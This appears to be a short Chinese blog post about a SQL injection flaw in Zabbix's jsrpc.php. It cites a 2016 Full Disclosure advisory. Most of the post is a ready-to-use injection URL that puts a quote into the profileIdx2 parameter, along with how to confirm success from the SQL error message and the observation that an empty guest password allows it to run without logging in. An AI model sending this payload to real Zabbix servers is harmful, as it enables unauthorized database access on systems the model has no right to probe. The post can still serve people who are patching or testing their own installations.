zabbix高危sql注入

payload

jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&tim
estamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=hi
story.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfil
e=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=
17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&
mark_color=1

有漏洞的话会出现

You have an error in your SQL syntax

有时候测试会出现

You are not logged in

这是因为给guest账号设置了密码,原文说不需要登录是默认开启了guest且guest密码默认为空的情况下。

来源:http://seclists.org/fulldisclosure/2016/Aug/82

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码